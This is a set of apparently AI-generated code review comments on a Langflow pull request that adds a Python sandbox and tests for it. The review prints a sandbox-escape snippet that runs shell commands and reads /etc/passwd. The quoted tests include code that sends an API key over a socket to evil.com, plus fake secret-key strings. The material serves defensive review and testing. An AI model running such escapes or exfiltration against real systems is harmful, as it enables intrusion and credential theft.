+            # while still blocking dangerous system-level operations
+            is_lfx_module = module_name == "lfx" or module_name.startswith("lfx.")
+            is_langflow_module = module_name == "langflow" or module_name.startswith("langflow.")
+
+            # If it's not a blocked module, and not langflow/lfx, it's allowed
+            # (We've already checked BLOCKED_MODULES above, so anything reaching here is safe)
+
+        # Import the module (still isolated namespace-wise)
+        return importlib.import_module(name)
+
+    return isolated_import


⚠️ Potential issue | 🔴 Critical

Critical sandbox escape via import builtins (real builtins and __import__ are reachable).

Inside the sandbox, user code can currently do:

import builtins as real_builtins real_builtins.__import__("os").system("whoami") real_builtins.open("/etc/passwd").read()

Reason: create_isolated_import always delegates to importlib.import_module(name) and has no special handling for the "builtins" module. So import builtins returns the real builtins module, not the IsolatedBuiltinsModule you build in create_isolated_builtins. From there, all dangerous builtins and the real __import__ are available, bypassing both BLOCKED_BUILTINS and BLOCKED_MODULES.

This breaks the core sandbox guarantee and should be fixed before relying on this in production.

A minimal fix is to thread the isolated builtins into create_isolated_import and special‑case "builtins" so imports always see the fake module:

-import builtins -import importlib -import os -from typing import Any, Dict, Set +import builtins +import importlib +import os +from typing import Any @@ -def create_isolated_builtins() -> Dict[str, Any]: +def create_isolated_builtins() -> dict[str, Any]: @@ - class IsolatedBuiltinsModule: + class IsolatedBuiltinsModule: """Fake builtins module that prevents escaping.""" @@ - isolated_builtins["builtins"] = IsolatedBuiltinsModule() + isolated_builtins["builtins"] = IsolatedBuiltinsModule() @@ -def create_isolated_import(): +def create_isolated_import(isolated_builtins: dict[str, Any]): @@ - def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0): # noqa: A002, ARG001 + def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0): # noqa: A002, ARG001 @@ - module_name = name.split(".")[0] - + module_name = name.split(".")[0] + + # Never expose the real `builtins` module into the sandbox. + # Always return the isolated fake module created in `create_isolated_builtins`. + if module_name == "builtins": + return isolated_builtins["builtins"] + @@ - return isolated_import + return isolated_import @@ - # Create isolated builtins - prevents accessing real __builtins__ - isolated_builtins = create_isolated_builtins() - - # Create isolated import function - isolated_import = create_isolated_import() + # Create isolated builtins - prevents accessing real __builtins__ + isolated_builtins = create_isolated_builtins() + + # Create isolated import function; it needs access to `isolated_builtins` + # so that `import builtins` returns the fake module, not the real one. + isolated_import = create_isolated_import(isolated_builtins)

This ensures import builtins inside the sandbox always returns the restricted IsolatedBuiltinsModule, so attempts to reach open, __import__, etc., will hit your SecurityViolation checks instead of the real interpreter module.

coderabbitai · 2025-11-24T01:20:17Z

src/lfx/src/lfx/custom/validate.py

+from lfx.custom.sandbox import create_isolated_import, execute_in_sandbox
 from lfx.field_typing.constants import CUSTOM_COMPONENT_SUPPORTED_TYPES, DEFAULT_IMPORT_STRING


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Sandboxed import handling changes error surface for “dangerous” modules

validate_code now uses create_isolated_import() for both ast.Import and ast.ImportFrom and treats any Exception (including security violations from blocked modules) as an import error. That means code importing e.g. os/subprocess will start producing additional entries in result["imports"]["errors"], whereas previously only truly missing modules would. This is probably desirable for the validate endpoint, but it diverges from tests like test_code_with_multiple_imports which currently expect exactly two errors for nonexistent1/nonexistent2. Please double‑check the existing tests and any API consumers that depend on the old “only ModuleNotFoundError counts” behavior and update them or narrow the exception handling (e.g., distinguish SecurityViolation vs ModuleNotFoundError) as needed.

Also applies to: 51-73

I'll verify the review comment by examining the actual code and tests to understand if the sandboxing change breaks existing behavior.

🏁 Script executed:

#!/bin/bash # Find and examine the validate.py file to understand the new import and its usage find . -name "validate.py" -type f | grep -E "lfx|custom" | head -5

Length of output: 83

🏁 Script executed:

#!/bin/bash # Find and examine the sandbox.py file to understand exception types find . -name "sandbox.py" -type f | head -5

Length of output: 35

🏁 Script executed:

#!/bin/bash # Find the test file mentioned in the review find . -name "test_validate.py" -type f | head -5

Length of output: 151

🏁 Script executed:

#!/bin/bash # Examine the validate.py file under review (lines 1-80 for context) cat ./src/lfx/src/lfx/custom/validate.py | head -80

Length of output: 2960

🏁 Script executed:

#!/bin/bash # Examine sandbox.py to understand exception types and create_isolated_import behavior cat ./src/lfx/src/lfx/custom/sandbox.py

Length of output: 8868

🏁 Script executed:

#!/bin/bash # Search for test_code_with_multiple_imports in test files rg -n "test_code_with_multiple_imports" ./src/backend/tests/unit/utils/ ./src/lfx/tests/

Length of output: 98

🏁 Script executed:

#!/bin/bash # Examine the test file to see test_code_with_multiple_imports expectations cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '123,160p'

Length of output: 1431

🏁 Script executed:

#!/bin/bash # Get more context around that test, including imports and setup cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '1,50p'

Length of output: 1298

🏁 Script executed:

#!/bin/bash # Search for other tests that check import errors count rg -n "imports.*errors" ./src/backend/tests/unit/utils/test_validate.py -A 2 -B 2

Length of output: 1276

🏁 Script executed:

#!/bin/bash # Check the other tests that expect empty imports errors or specific counts cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '55,92p'

Length of output: 1192

🏁 Script executed:

#!/bin/bash # Check if there's any setup/teardown that sets the environment variable rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE" ./src/backend/tests/unit/utils/test_validate.py

Length of output: 0

🏁 Script executed:

#!/bin/bash # Check if this test file has any class setup or pytest fixtures grep -n "setUp\|@pytest.fixture\|@classmethod" ./src/backend/tests/unit/utils/test_validate.py | head -20

Length of output: 0

🏁 Script executed:

#!/bin/bash # Verify the exact lines in validate.py where exception handling occurs (51-73) cat ./src/lfx/src/lfx/custom/validate.py | sed -n '51,75p'

Length of output: 1298

🏁 Script executed:

#!/bin/bash # Double-check that os and sys are indeed in BLOCKED_MODULES grep -n "\"os\"\|\"sys\"" ./src/lfx/src/lfx/custom/sandbox.py

Length of output: 26

Update test expectations for new sandbox behavior in test_code_with_multiple_imports

The sandboxing change correctly surfaces blocked modules (e.g., os, sys) as import errors via SecurityViolation, which is caught by the generic except Exception handler. However, test_code_with_multiple_imports imports both os and sys (both in BLOCKED_MODULES) and expects exactly 2 errors for nonexistent modules only. After this change, the test will receive 4 errors: os, sys, nonexistent1, and nonexistent2, causing the assertion assert len(result["imports"]["errors"]) == 2 to fail.

Suggested fixes:

Update the test to either:

Remove os and sys from the test code if only testing nonexistent modules

Update the assertion to expect 4 errors if the intent is testing mixed scenarios

Or, distinguish between SecurityViolation and ModuleNotFoundError in validate.py if dangerous modules should not be counted as validation errors (though blocking them at import time is better for security)

Test file: ./src/backend/tests/unit/utils/test_validate.py (lines 123-138)

🤖 Prompt for AI Agents

In src/lfx/src/lfx/custom/validate.py around lines 11-12, the sandbox now raises SecurityViolation for blocked modules (e.g., os, sys) which are being caught by the generic exception handler and counted as import errors, causing tests that expect only ModuleNotFoundError counts to fail; to fix, either update the unit test ./src/backend/tests/unit/utils/test_validate.py (lines 123-138) to remove os/sys from the test input or change the assertion to expect 4 errors, or modify validate.py to catch SecurityViolation separately and either skip adding it to imports["errors"] or classify it under a distinct imports["blocked"] key (implement by adding an except SecurityViolation: branch that handles/filters those exceptions before the generic except Exception).

coderabbitai · 2025-11-24T01:20:17Z

src/lfx/tests/unit/custom/test_sandbox_isolation.py

+def test_sandbox_cannot_access_parent_globals():
+    """Test that sandboxed code cannot access parent function's globals."""
+    # Set a variable in the parent scope
+    parent_var = "should_not_be_accessible"
+
+    code = """
+def test():
+    # Try to access parent_var from parent scope
+    # If isolation were broken, this would work
+    return parent_var
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # Execute in sandbox
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Try to call the function
+    test_func = exec_globals["test"]
+
+    # Should raise NameError because parent_var is not accessible
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_modify_parent_globals():
+    """Test that sandboxed code cannot modify parent scope's globals."""
+    parent_dict = {"value": "original"}
+
+    code = """
+def test():
+    # Try to modify parent_dict
+    # If isolation were broken, this would modify the real parent_dict
+    parent_dict["value"] = "modified"
+    return parent_dict["value"]
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function - should fail because parent_dict is not accessible
+    test_func = exec_globals["test"]
+
+    with pytest.raises(NameError):
+        test_func()
+
+    # Verify parent_dict was not modified
+    assert parent_dict["value"] == "original"
+
+
+def test_sandbox_isolated_builtins():
+    """Test that sandbox uses isolated builtins, not real ones."""
+    # Create a marker in real builtins (simulating server state)
+    import builtins
+    original_builtins_len = len(dir(builtins))
+
+    code = """
+def test():
+    import builtins
+    # Try to access real builtins
+    # If isolation were broken, we could modify real builtins
+    builtins.ESCAPE_TEST = "should_not_exist"
+    return hasattr(builtins, 'ESCAPE_TEST')
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+    result = test_func()
+
+    # Should return False or True but not affect real builtins
+    # Verify real builtins wasn't modified
+    assert not hasattr(builtins, "ESCAPE_TEST")
+    assert len(dir(builtins)) == original_builtins_len
+
+
+def test_sandbox_fresh_namespace_per_execution():
+    """Test that each execution gets a fresh isolated namespace."""
+    code1 = """
+GLOBAL_VAR = "first_execution"
+def test():
+    return GLOBAL_VAR
+"""
+    code_obj1 = compile(code1, "<test>", "exec")
+    exec_globals1 = {}
+    execute_in_sandbox(code_obj1, exec_globals1)
+
+    # Second execution with different code
+    code2 = """
+def test():
+    # Try to access GLOBAL_VAR from previous execution
+    # If isolation were broken, this would work
+    return GLOBAL_VAR
+"""
+    code_obj2 = compile(code2, "<test>", "exec")
+    exec_globals2 = {}
+    execute_in_sandbox(code_obj2, exec_globals2)
+
+    # Should raise NameError because GLOBAL_VAR doesn't exist in this execution
+    test_func = exec_globals2["test"]
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_access_frame_locals():
+    """Test that sandboxed code cannot access caller's local variables."""
+    def caller_function():
+        local_var = "should_not_be_accessible"
+
+        code = """
+def test():
+    # Try to access local_var from caller
+    # If isolation were broken, this would work
+    return local_var
+"""
+        code_obj = compile(code, "<test>", "exec")
+        exec_globals = {}
+
+        execute_in_sandbox(code_obj, exec_globals)
+
+        # Call the function
+        test_func = exec_globals["test"]
+
+        # Should raise NameError because local_var is not accessible
+        with pytest.raises(NameError):
+            test_func()
+
+    caller_function()
+
+
+def test_sandbox_isolated_imports():
+    """Test that imports in sandbox are isolated from parent scope."""
+    # Set up a mock module in parent scope (simulating server state)
+    import sys
+    original_modules = set(sys.modules.keys())
+
+    code = """
+import json
+def test():
+    # Import json - should be isolated
+    return json.__name__
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+    result = test_func()
+
+    # Should work but json import should be isolated
+    assert result == "json"
+
+    # Verify we didn't accidentally modify sys.modules in a way that persists
+    # (though importlib.import_module does modify sys.modules, the key is that
+    # the sandbox's view of modules is isolated)
+    current_modules = set(sys.modules.keys())
+    # New modules might be added, but that's expected for imports
+
+
+def test_sandbox_function_definition_time_isolation():
+    """Test that function definition time code (default args) executes in isolation."""
+    parent_var = "should_not_be_accessible"
+
+    code = """
+def test(x=parent_var):
+    # Default argument evaluation happens at definition time
+    # If isolation were broken, parent_var would be accessible
+    return x
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # Execute in sandbox - definition time code runs here
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Try to call the function
+    test_func = exec_globals["test"]
+
+    # Should raise NameError when function is defined (default arg evaluation)
+    # OR when called without args
+    # The key is that parent_var is not accessible during definition
+    with pytest.raises(NameError):
+        test_func()  # Calling without args triggers default arg evaluation
+
+
+def test_sandbox_decorator_isolation():
+    """Test that decorator evaluation happens in isolation."""
+    parent_var = "should_not_be_accessible"
+
+    code = """
+@(parent_var or lambda f: f)
+def test():
+    return 1
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # Execute in sandbox - decorator evaluation happens here
+    # Should raise NameError because parent_var is not accessible
+    with pytest.raises(NameError):
+        execute_in_sandbox(code_obj, exec_globals)
+


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Tests assume exec_globals is populated by execute_in_sandbox, but the implementation does not do that

All of these tests follow the pattern:

exec_globals = {} execute_in_sandbox(code_obj, exec_globals) test_func = exec_globals["test"] test_func()

However, execute_in_sandbox currently creates an internal sandbox_globals dict, updates it with exec_globals, and executes the code there without writing any new names (like test) back into exec_globals. As written, exec_globals["test"] will raise KeyError, so the assertions about NameError and isolation never actually run.

To make these tests exercise the real contract of execute_in_sandbox, you probably want one of:

Change execute_in_sandbox to treat exec_globals as the sandbox globals (and let exec populate it), or to return the sandbox namespace so tests can pull out test from the returned dict, or

Restructure tests to assert on exceptions raised directly from execute_in_sandbox (e.g., have the code string call test() at module top level so a NameError occurs during exec), instead of trying to retrieve and call the function afterwards.

Also, test_sandbox_isolated_builtins assumes that mutating builtins inside the sandbox cannot affect the process‑wide builtins module. Given create_isolated_import currently delegates to importlib.import_module, you may still be importing the real builtins module inside the sandbox; verify this expectation against the actual sandbox implementation.

--- 🏁 Script executed: ```shell #!/bin/bash # Find sandbox-related files and the execute_in_sandbox function fd -t f "sandbox" --type python | head -20

Length of output: 173

🏁 Script executed:

#!/bin/bash # Search for execute_in_sandbox definition rg -n "def execute_in_sandbox" --type python

Length of output: 30

🏁 Script executed:

#!/bin/bash # Search for create_isolated_import and create_isolated_builtins rg -n "def create_isolated_(import|builtins)" --type python

Length of output: 30

🏁 Script executed:

#!/bin/bash # Verify the test file exists and show first few test patterns cat src/lfx/tests/unit/custom/test_sandbox_isolation.py | head -60

Length of output: 1759

--- 🏁 Script executed: ```shell #!/bin/bash # Find sandbox.py or related sandbox implementation fd sandbox -e py

Length of output: 136

🏁 Script executed:

#!/bin/bash # Search for execute_in_sandbox definition with correct syntax rg -n "def execute_in_sandbox" -g "*.py"

Length of output: 114

🏁 Script executed:

#!/bin/bash # Search for sandbox-related imports and implementations rg -n "execute_in_sandbox|create_isolated" -g "*.py" -A 5

Length of output: 13244

🏁 Script executed:

#!/bin/bash # Look for the custom module structure find . -type d -name custom | head -10

Length of output: 119

--- 🏁 Script executed: ```shell #!/bin/bash # Get full execute_in_sandbox implementation sed -n '176,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2592

🏁 Script executed:

#!/bin/bash # Get create_isolated_builtins implementation sed -n '88,139p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2274

🏁 Script executed:

#!/bin/bash # Get create_isolated_import implementation sed -n '140,175p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1712

🏁 Script executed:

#!/bin/bash # Check the full sandbox.py to see how sandbox_globals is used wc -l src/lfx/src/lfx/custom/sandbox.py

Length of output: 37

Tests assume exec_globals is populated after execute_in_sandbox() returns, but the implementation does not do this

The core issue: execute_in_sandbox creates an internal sandbox_globals dict, merges exec_globals into it (line 218), executes code in that dict, and returns None without writing anything back to exec_globals. All tests then try to access exec_globals["test"], which will raise KeyError before any isolation assertions run.

Every test in this module follows the failing pattern:

exec_globals = {} execute_in_sandbox(code_obj, exec_globals) test_func = exec_globals["test"] # KeyError - exec_globals was never modified

To fix this, either:

Modify execute_in_sandbox to return the sandbox namespace (or write it back to exec_globals), or

Restructure tests to assert on exceptions during execute_in_sandbox itself (e.g., have code call the test function at module level so NameError occurs during exec)

Additionally, create_isolated_import uses importlib.import_module(), which returns the real builtins module, not the IsolatedBuiltinsModule wrapper. This means code that does import builtins gets the actual module, and mutations inside the sandbox could affect the process-wide builtins. Verify whether this matches your isolation intent.

🤖 Prompt for AI Agents

In src/lfx/tests/unit/custom/test_sandbox_isolation.py around lines 11-218, tests assume execute_in_sandbox populates the passed exec_globals with the executed namespace but the current implementation builds an internal sandbox_globals, executes into it and returns None (line ~218), leaving exec_globals empty and causing KeyError; fix by changing execute_in_sandbox to either write the final sandbox namespace back into the provided exec_globals dict (e.g., clear exec_globals and update it with sandbox_globals) or return the sandbox namespace and update callers/tests accordingly so exec_globals["test"] exists after execution; also address create_isolated_import returning real modules (not wrappers) by ensuring the sandboxed import mechanism injects isolated module objects (or a wrapped builtins module) into the sandbox's sys.modules/builtins mapping during exec so an in-sandbox "import builtins" yields the isolated builtins rather than the process-wide one.

coderabbitai · 2025-11-24T01:20:17Z

src/lfx/tests/unit/custom/test_sandbox_security.py

+def test_sandbox_cannot_access_server_python_secrets():
+    """CRITICAL: Test that sandboxed code cannot access server's Python variables/secrets.
+    
+    This is the KEY security property - code cannot access server secrets stored in memory.
+    Even if code can do file I/O or network requests, it can't access server secrets to exfiltrate.
+    """
+    # Simulate server secrets stored in Python variables
+    server_api_key = "sk-secret-key-12345"
+    server_db_password = "db_password_secret"
+    server_config = {
+        "api_key": server_api_key,
+        "database_url": "postgresql://user:password@localhost/db"
+    }
+
+    code = """
+def test():
+    # Try to access server's Python variables containing secrets
+    # If isolation is broken, these would be accessible
+    return server_api_key, server_db_password, server_config
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # CRITICAL: Should raise NameError - server secrets are not accessible
+    # This is what prevents credential theft
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_access_server_credentials_via_python():
+    """Test that code cannot access server credentials stored in Python variables.
+    
+    Even if code can do file I/O or network requests, it can't access server secrets
+    stored in Python variables to exfiltrate them.
+    """
+    # Simulate server storing credentials in Python variables
+    class ServerConfig:
+        def __init__(self):
+            self.api_key = "sk-secret-12345"
+            self.database_url = "postgresql://user:pass@localhost/db"
+            self.secret_token = "token_secret_xyz"
+
+    server_config = ServerConfig()
+
+    code = """
+def test():
+    # Try to access server's credential objects
+    # If isolation is broken, we could access server_config.api_key
+    return server_config.api_key
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # CRITICAL: Should raise NameError - server_config is not accessible
+    # This prevents credential theft even if code can do file I/O or network requests
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_access_server_python_state():
+    """Test that code cannot access server's Python state, even if it can access system resources.
+    
+    This is the key security property: namespace isolation prevents access to server secrets
+    stored in Python variables, even though code can access system resources like os.environ.
+    """
+    # Server stores secrets in Python variables (not just env vars)
+    server_secrets = {
+        "api_key": "sk-secret-from-python-var",
+        "db_password": "password-from-python-var"
+    }
+
+    code = """
+import os
+def test():
+    # Code CAN access os.environ (system resource)
+    env_key = os.environ.get('TEST_ENV_VAR', 'not_found')
+    
+    # But code CANNOT access server's Python variables
+    # If isolation is broken, server_secrets would be accessible
+    python_secret = server_secrets['api_key']
+    
+    return env_key, python_secret
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # Set env var to test that system resources ARE accessible
+    os.environ["TEST_ENV_VAR"] = "env_value"
+
+    try:
+        execute_in_sandbox(code_obj, exec_globals)
+
+        # Call the function
+        test_func = exec_globals["test"]
+
+        # Should raise NameError - server_secrets Python variable is not accessible
+        # This proves namespace isolation works, even though os.environ is accessible
+        with pytest.raises(NameError):
+            test_func()
+    finally:
+        if "TEST_ENV_VAR" in os.environ:
+            del os.environ["TEST_ENV_VAR"]
+
+
+def test_sandbox_cannot_exfiltrate_secrets_via_commands():
+    """Test that code cannot access server secrets to pass to system commands.
+    
+    Code CAN execute system commands, but it CANNOT access server secrets
+    stored in Python variables to pass to those commands.
+    """
+    # Server secret stored in Python variable
+    server_secret = "secret_password_12345"
+
+    code = """
+import subprocess
+def test():
+    # Code CAN execute commands
+    # But code CANNOT access server_secret to pass to command
+    # If isolation is broken, we could do: subprocess.run(['echo', server_secret])
+    result = subprocess.check_output(['echo', server_secret], text=True)
+    return result.strip()
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # CRITICAL: Should raise NameError - server_secret is not accessible
+    # This prevents code from exfiltrating secrets via system commands
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_access_server_python_variables():
+    """Test that sandboxed code cannot access server's Python variables/state.
+    
+    This is what namespace isolation actually prevents.
+    """
+    # Set a variable in the "server" scope
+    server_secret = "server_secret_value"
+    server_config = {"api_key": "secret_key_123"}
+
+    code = """
+def test():
+    # Try to access server's Python variables
+    # If isolation is broken, these would be accessible
+    return server_secret, server_config
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # Should raise NameError - server variables are not accessible
+    with pytest.raises(NameError):
+        test_func()
+
+
+def test_sandbox_cannot_modify_server_python_state():
+    """Test that sandboxed code cannot modify server's Python state."""
+    server_state = {"modified": False}
+
+    code = """
+def test():
+    # Try to modify server state
+    server_state["modified"] = True
+    return server_state
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # Should raise NameError - server_state is not accessible
+    with pytest.raises(NameError):
+        test_func()
+
+    # Verify server state was not modified
+    assert server_state["modified"] is False
+
+
+def test_sandbox_cannot_exfiltrate_secrets_via_network():
+    """Test that code cannot access server secrets to send via network requests.
+    
+    Code CAN make network requests, but it CANNOT access server secrets
+    stored in Python variables to send in those requests.
+    """
+    # Server secret stored in Python variable
+    server_api_key = "sk-secret-key-to-exfiltrate"
+
+    code = """
+import socket
+def test():
+    # Code CAN make network requests
+    # But code CANNOT access server_api_key to send
+    # If isolation is broken, we could do: socket.send(server_api_key.encode())
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(('evil.com', 1337))
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'
+"""
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    execute_in_sandbox(code_obj, exec_globals)
+
+    # Call the function
+    test_func = exec_globals["test"]
+
+    # CRITICAL: Should raise NameError - server_api_key is not accessible
+    # This prevents code from exfiltrating secrets via network requests
+    with pytest.raises(NameError):
+        test_func()
+


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Security tests don’t match the current sandbox contract and may be brittle

A few intertwined issues here:

Namespace contract mismatch (same as isolation tests)
Every test does:

exec_globals = {} execute_in_sandbox(code_obj, exec_globals) test_func = exec_globals["test"]

But execute_in_sandbox builds its own sandbox_globals dict and never writes back into exec_globals, so exec_globals["test"] will raise KeyError before any NameError about server_* variables can be observed. Either adjust execute_in_sandbox to expose the sandbox namespace (e.g., by mutating or returning it) or rewrite the tests to assert on exceptions raised directly from execute_in_sandbox.

Assumptions about dangerous modules being usable
Several tests assume os, subprocess, and socket imports succeed and that only access to server‑side Python variables is blocked. The sandbox implementation, however, is documented to block these modules by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION is enabled. Without that toggle set, these tests are likely to fail at import time with a security error rather than the intended NameError. Consider:

Explicitly setting/resetting the env flag in a fixture for these tests, or

Splitting tests to cover both “dangerous allowed” and “dangerous blocked” modes, asserting on the correct exception type in each.

Real subprocess/network usage in unit tests
subprocess.check_output and socket.connect/send are being called for real. Even if the name‑resolution failure is ultimately what you want to assert, the code will still attempt to open processes and network connections first, which can make tests flaky or environment‑dependent. Stubbing these (e.g., monkeypatch or patch subprocess.check_output / socket.socket) would keep the tests focused purely on namespace isolation semantics.

Overall, the intent of these tests is good, but they need to be brought in line with how execute_in_sandbox and the “dangerous modules” toggle actually behave.

I'll verify the review comment by examining the actual execute_in_sandbox implementation and related sandbox configuration.

--- 🏁 Script executed: ```shell #!/bin/bash # Find execute_in_sandbox function definition rg -n "def execute_in_sandbox" --type py -A 15

Length of output: 1394

🏁 Script executed:

#!/bin/bash # Search for LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION usage rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION" --type py -C 2

Length of output: 3463

🏁 Script executed:

#!/bin/bash # Find sandbox module and dangerous modules handling rg -n "dangerous.*module|block.*import" --type py -i -C 3

Length of output: 15508

🏁 Script executed:

#!/bin/bash # Check test file imports at the top of test_sandbox_security.py head -n 30 src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 1281

🏁 Script executed:

#!/bin/bash # Search for where globals dict is populated or returned in sandbox rg -n "exec_globals|sandbox_globals" --type py -B 2 -A 5 | head -100

Length of output: 7723

I need to see the full implementation of execute_in_sandbox to verify whether it mutates exec_globals and when the dangerous module errors occur.

--- 🏁 Script executed: ```shell #!/bin/bash # Get full execute_in_sandbox implementation sed -n '176,210p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1518

🏁 Script executed:

#!/bin/bash # Get the complete sandbox_globals creation and execution logic sed -n '200,230p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1156

🏁 Script executed:

#!/bin/bash # Look for where globals dict is populated after exec rg -n "sandbox_globals\|exec_globals" src/lfx/src/lfx/custom/sandbox.py -A 3 -B 1

Length of output: 0

🏁 Script executed:

#!/bin/bash # Check if there are fixtures in test_sandbox_security.py that set the env var grep -n "LANGFLOW_ALLOW_DANGEROUS_CODE\|monkeypatch\|setenv" src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 0

I need to see the end of the execute_in_sandbox function to understand if exec_globals is mutated with the sandbox results.

--- 🏁 Script executed: ```shell #!/bin/bash # Get the complete execute_in_sandbox function from line 230 onward sed -n '230,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 424

🏁 Script executed:

#!/bin/bash # Get the entire execute_in_sandbox function in one view awk '/^def execute_in_sandbox/,/^def [a-z_]/ {print NR": "$0}' src/lfx/src/lfx/custom/sandbox.py | head -80

Length of output: 81

🏁 Script executed:

#!/bin/bash # Count total lines in sandbox.py and get end of function wc -l src/lfx/src/lfx/custom/sandbox.py

Length of output: 37

🏁 Script executed:

#!/bin/bash # Get lines 230-260 to see exec call and what happens sed -n '230,260p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 424

Security tests won't pass with current sandbox implementation and are brittle

The review comment accurately identifies three real issues:

exec_globals dict is never populated (confirmed)
execute_in_sandbox merges exec_globals into sandbox_globals at line 224, executes code in sandbox_globals, but never writes results back. Tests calling exec_globals["test"] will raise KeyError before assertions are reached.

Dangerous modules fail at import time with SecurityViolation (confirmed)
Tests assume import os, import subprocess, import socket succeed. However, when exec() runs the code at line 232, these imports trigger create_isolated_import(), which raises SecurityViolation (lines 155–160) because ALLOW_DANGEROUS_CODE defaults to false. The function re-raises this exception, so tests fail before reaching the intended NameError assertions. No fixtures set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true.

Real subprocess/network I/O (would occur if imports succeeded)
subprocess.check_output and socket.connect('evil.com', 1337) execute for real, making tests flaky and environment-dependent.

Recommendation: Either refactor execute_in_sandbox to populate exec_globals with the sandbox namespace results, or rewrite tests to assert on exceptions from execute_in_sandbox itself and use pytest fixtures to explicitly enable/disable dangerous modules for different test scenarios.

🧰 Tools

🪛 Gitleaks (8.29.0)

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

🤖 Prompt for AI Agents

In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 23-256, the tests fail because execute_in_sandbox does not write back the sandbox namespace into the provided exec_globals, dangerous-module imports raise SecurityViolation at exec time (so tests never reach NameError assertions), and tests allow real subprocess/socket IO; fix by (1) updating execute_in_sandbox to merge the final sandbox_globals back into the provided exec_globals so test_func is available to callers, (2) change these tests to either enable dangerous imports via a dedicated pytest fixture/env var when you intend to allow them or assert that execute_in_sandbox raises SecurityViolation for blocked imports (instead of expecting NameError), and (3) prevent real external IO by monkeypatching/mocking subprocess and socket calls (or replace those test cases with mocks/stubs) so tests remain deterministic and do not perform network/command execution.

coderabbitai · 2025-11-24T01:20:17Z

src/lfx/tests/unit/custom/test_sandbox_security.py

+    # Simulate server secrets stored in Python variables
+    server_api_key = "sk-secret-key-12345"
+    server_db_password = "db_password_secret"
+    server_config = {
+        "api_key": server_api_key,
+        "database_url": "postgresql://user:password@localhost/db"
+    }
+


⚠️ Potential issue | 🟡 Minor

Hard‑coded “API key”‑like test strings will keep tripping secret scanners

Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.

A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:

"sk-test-not-a-real-key-12345"

"dummy-secret-key"

or similar, or centralize them in a constant that scanners are configured to ignore.

Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231

🧰 Tools

🪛 Gitleaks (8.29.0)

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

coderabbitai

Actionable comments posted: 9

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.

Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.
-        BoolInput(
